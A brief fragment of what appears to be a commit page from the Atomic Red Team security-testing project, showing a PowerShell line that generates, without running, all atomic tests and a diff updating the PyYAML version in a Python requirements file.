$AllAtomicTests.GetEnumerator() | Foreach-Object { Invoke-AtomicTest $_.Value -GenerateOnly }
Invoke-AllAtomicTests -GenerateOnly
.NOTES
execution-frameworks/contrib/python/requirements.txt
+1 -1
View File
@@ -1,2 +1,2 @@
Unidecode==1.0.22
PyYAML==3.12
PyYAML>=4.2b1